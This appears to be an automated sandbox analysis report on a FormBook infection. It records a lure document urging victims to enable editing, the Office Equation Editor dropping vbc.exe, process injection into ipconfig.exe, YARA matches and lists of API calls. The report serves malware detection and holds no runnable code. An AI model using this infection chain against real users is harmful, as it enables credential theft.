Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: document is protected 16 17 '8 t9 19 20 21 Open the ckkument In If this document was Microsof
Source: Screenshot number: 4	Screenshot OCR: protected documents the yellow bar above 24 25 26 27 28 29 30 31 32 33 34 35 36 37 ~

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004181D0 NtCreateFile,	5_2_004181D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418280 NtReadFile,	5_2_00418280
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418300 NtClose,	5_2_00418300
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004183B0 NtAllocateVirtualMemory,	5_2_004183B0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004182FB NtClose,	5_2_004182FB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009100C4 NtCreateFile,LdrInitializeThunk,	5_2_009100C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00910048 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_00910048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00910078 NtResumeThread,LdrInitializeThunk,	5_2_00910078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009107AC NtCreateMutant,LdrInitializeThunk,	5_2_009107AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090F9F0 NtClose,LdrInitializeThunk,	5_2_0090F9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090F900 NtReadFile,LdrInitializeThunk,	5_2_0090F900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_0090FAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk,	5_2_0090FAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FBB8 NtQueryInformationToken,LdrInitializeThunk,	5_2_0090FBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_0090FB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FC90 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_0090FC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FC60 NtMapViewOfSection,LdrInitializeThunk,	5_2_0090FC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FD8C NtDelayExecution,LdrInitializeThunk,	5_2_0090FD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_0090FDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FEA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_0090FEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_0090FED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FFB4 NtCreateSection,LdrInitializeThunk,	5_2_0090FFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009110D0 NtOpenProcessToken,	5_2_009110D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00910060 NtQuerySection,	5_2_00910060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009101D4 NtSetValueKey,	5_2_009101D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091010C NtOpenDirectoryObject,	5_2_0091010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00911148 NtOpenThread,	5_2_00911148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090F8CC NtWaitForSingleObject,	5_2_0090F8CC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00911930 NtSetContextThread,	5_2_00911930
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090F938 NtWriteFile,	5_2_0090F938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FAB8 NtQueryValueKey,	5_2_0090FAB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FA20 NtQueryInformationFile,	5_2_0090FA20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FA50 NtEnumerateValueKey,	5_2_0090FA50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FBE8 NtQueryVirtualMemory,	5_2_0090FBE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FB50 NtCreateKey,	5_2_0090FB50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FC30 NtOpenProcess,	5_2_0090FC30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00910C40 NtGetContextThread,	5_2_00910C40
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FC48 NtSetInformationFile,	5_2_0090FC48
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00911D80 NtSuspendThread,	5_2_00911D80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FD5C NtEnumerateKey,	5_2_0090FD5C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FE24 NtWriteVirtualMemory,	5_2_0090FE24
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FFFC NtCreateProcessEx,	5_2_0090FFFC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FF34 NtQueueApcThread,	5_2_0090FF34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023A00C4 NtCreateFile,LdrInitializeThunk,	7_2_023A00C4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023A07AC NtCreateMutant,LdrInitializeThunk,	7_2_023A07AC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_0239FAE8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_0239FB68
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FB50 NtCreateKey,LdrInitializeThunk,	7_2_0239FB50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_0239FBB8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239F900 NtReadFile,LdrInitializeThunk,	7_2_0239F900
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239F9F0 NtClose,LdrInitializeThunk,	7_2_0239F9F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_0239FED0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FFB4 NtCreateSection,LdrInitializeThunk,	7_2_0239FFB4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_0239FC60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FD8C NtDelayExecution,LdrInitializeThunk,	7_2_0239FD8C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_0239FDC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023A0078 NtResumeThread,	7_2_023A0078
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023A0060 NtQuerySection,	7_2_023A0060
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023A0048 NtProtectVirtualMemory,	7_2_023A0048
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023A10D0 NtOpenProcessToken,	7_2_023A10D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023A010C NtOpenDirectoryObject,	7_2_023A010C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023A1148 NtOpenThread,	7_2_023A1148
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023A01D4 NtSetValueKey,	7_2_023A01D4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FA20 NtQueryInformationFile,	7_2_0239FA20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FA50 NtEnumerateValueKey,	7_2_0239FA50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FAB8 NtQueryValueKey,	7_2_0239FAB8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FAD0 NtAllocateVirtualMemory,	7_2_0239FAD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FBE8 NtQueryVirtualMemory,	7_2_0239FBE8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239F8CC NtWaitForSingleObject,	7_2_0239F8CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239F938 NtWriteFile,	7_2_0239F938
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023A1930 NtSetContextThread,	7_2_023A1930
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FE24 NtWriteVirtualMemory,	7_2_0239FE24
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FEA0 NtReadVirtualMemory,	7_2_0239FEA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FF34 NtQueueApcThread,	7_2_0239FF34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FFFC NtCreateProcessEx,	7_2_0239FFFC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FC30 NtOpenProcess,	7_2_0239FC30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FC48 NtSetInformationFile,	7_2_0239FC48
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023A0C40 NtGetContextThread,	7_2_023A0C40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FC90 NtUnmapViewOfSection,	7_2_0239FC90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0239FD5C NtEnumerateKey,	7_2_0239FD5C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023A1D80 NtSuspendThread,	7_2_023A1D80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_000981D0 NtCreateFile,	7_2_000981D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00098280 NtReadFile,	7_2_00098280
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00098300 NtClose,	7_2_00098300
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_000982FB NtClose,	7_2_000982FB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0051632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	7_2_0051632E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_005167C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	7_2_005167C7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00516332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_00516332
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_005167C2 NtQueryInformationProcess,	7_2_005167C2

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00EC7AF1	4_2_00EC7AF1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00492078	4_2_00492078
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004934FA	4_2_004934FA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00490094	4_2_00490094
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00495E64	4_2_00495E64
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00494879	4_2_00494879
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004904E0	4_2_004904E0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00494888	4_2_00494888
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0049A5C8	4_2_0049A5C8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00493200	4_2_00493200
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0049C6A0	4_2_0049C6A0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401027	5_2_00401027
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BA2A	5_2_0041BA2A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C6B	5_2_00408C6B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C70	5_2_00408C70
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C7DE	5_2_0041C7DE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EC7AF1	5_2_00EC7AF1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091E0C6	5_2_0091E0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0094D005	5_2_0094D005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0093905A	5_2_0093905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00923040	5_2_00923040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0099D06D	5_2_0099D06D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091E2E9	5_2_0091E2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009C1238	5_2_009C1238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009C63BF	5_2_009C63BF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009463DB	5_2_009463DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091F3CF	5_2_0091F3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00922305	5_2_00922305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00927353	5_2_00927353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096A37B	5_2_0096A37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00955485	5_2_00955485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00931489	5_2_00931489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A443E	5_2_009A443E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0095D47D	5_2_0095D47D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0093C5F0	5_2_0093C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A05E3	5_2_009A05E3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092351F	5_2_0092351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00966540	5_2_00966540
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00924680	5_2_00924680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092E6C1	5_2_0092E6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096A634	5_2_0096A634
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009C2622	5_2_009C2622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A579A	5_2_009A579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092C7BC	5_2_0092C7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009557C3	5_2_009557C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0099F8C4	5_2_0099F8C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009BF8EE	5_2_009BF8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092C85C	5_2_0092C85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0094286D	5_2_0094286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009C098E	5_2_009C098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009229B2	5_2_009229B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009369FE	5_2_009369FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A5955	5_2_009A5955
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A394B	5_2_009A394B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009D3A83	5_2_009D3A83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009CCBA4	5_2_009CCBA4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009ADBDA	5_2_009ADBDA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091FBD7	5_2_0091FBD7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00947B00	5_2_00947B00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009BFDDD	5_2_009BFDDD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00950D3B	5_2_00950D3B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092CD5B	5_2_0092CD5B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00952E2F	5_2_00952E2F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0093EE4C	5_2_0093EE4C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009BCFB1	5_2_009BCFB1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00992FDC	5_2_00992FDC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00930F3F	5_2_00930F3F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0094DF7C	5_2_0094DF7C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02451238	7_2_02451238
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023AE2E9	7_2_023AE2E9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023B2305	7_2_023B2305
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023FA37B	7_2_023FA37B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023B7353	7_2_023B7353
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023D63DB	7_2_023D63DB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023AF3CF	7_2_023AF3CF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_024563BF	7_2_024563BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0242D06D	7_2_0242D06D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023DD005	7_2_023DD005
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023C905A	7_2_023C905A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023B3040	7_2_023B3040
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023AE0C6	7_2_023AE0C6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023FA634	7_2_023FA634
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02452622	7_2_02452622
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023B4680	7_2_023B4680
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023BE6C1	7_2_023BE6C1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023BC7BC	7_2_023BC7BC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0243579A	7_2_0243579A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023E57C3	7_2_023E57C3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023ED47D	7_2_023ED47D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0243443E	7_2_0243443E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023C1489	7_2_023C1489
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023E5485	7_2_023E5485
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023B351F	7_2_023B351F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023F6540	7_2_023F6540
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_024305E3	7_2_024305E3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023CC5F0	7_2_023CC5F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02463A83	7_2_02463A83
